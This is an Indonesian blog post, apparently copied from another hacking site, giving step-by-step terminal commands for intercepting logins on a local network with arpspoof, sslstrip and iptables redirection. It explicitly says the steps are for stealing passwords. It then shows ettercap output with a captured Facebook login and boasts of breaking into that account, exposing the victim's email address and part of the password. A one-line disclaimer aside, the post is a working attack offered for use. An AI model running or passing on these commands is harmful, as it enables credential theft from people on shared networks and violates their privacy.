mula - mula anda masuk terminal, terus kalo udah masuk kita masuk ke root dulu dengan memberikan perintah ini sudo su-
Pertama-tama siapkan tool yang akan kita gunakan
- Arpspoof
- Sslstrip-0.9
- OS Linux 32 Bit
Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :
1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz
3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9
4) Dan untuk menginstal ketikkan : python setup.py install
Lakukan langkah berikut ( Jika paket sudah terinstall )
Gunakan cara ini setiap kali jika ingin mencuri password lagi:
1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward
2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr
3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp -
destination-port 80 -j REDIRECT --to-port 8080
4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1) adalah gateway dari
jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari
netstat -nr tadi)
5) Kemudian buka terminal baru lalu ketikkan : sslstrip -l 8080 untuk mengaktifkan cookies yang akan
kita baca
6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.
7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log
8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang
menggunakan username dan password. kita akan mengetahuinya.
karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah
find "pass: (tanpa petik) agar kita lebih mudah menemukannya
HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA !
Nah ini dia contoh saat Scanning: Social Enginering Toolkit (SET)
root@bt:~# ettercap -T -q -i eth0
ettercap NG-0.7.3 copyright @2013 Neyfa Kamila
Listening on eth0... (Ethernet)
eth0 -> 00:1E:68:2E:73:4A 1.0.0.64 255.255.255.0
Privileges dropped to UID 65534 GID 65534...
12 plugins
39 protocol dissectors
33 ports monitored
7587 mac vendor fingerprint
1990 tcp OS fingerprint
2633 known services
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
HTTP : 69.63.180.174:80 -> USER: martin.alfath@yahoo.com
PASS: c****g
INFO: http://www.facebook.com/
Dan ini Salah 1 Akun Facebook yg berhasil Gw Jebol ..
Email: martin.alfath@yahoo.com
Password: c****g
Sengaja Sebagian Password Gw pake bintang..
agar tidak ada Pencurian..
Kalo Mau Liat Buktinya.. Buka Facebook kalian
trus Copas emailnya di Kotak Pencari Facebook..
klik Profile'a, lalu lihat status terbarunya ^_^
Atau Bisa Klik Link Yg Menuju Profil'a disini:
http://www.facebook.com/fadlhana
Sumber : http://nemi.faa.im/hacking-facebook-dengan-backtrack-5-r3.xhtml
0 komentar:
Posting Komentar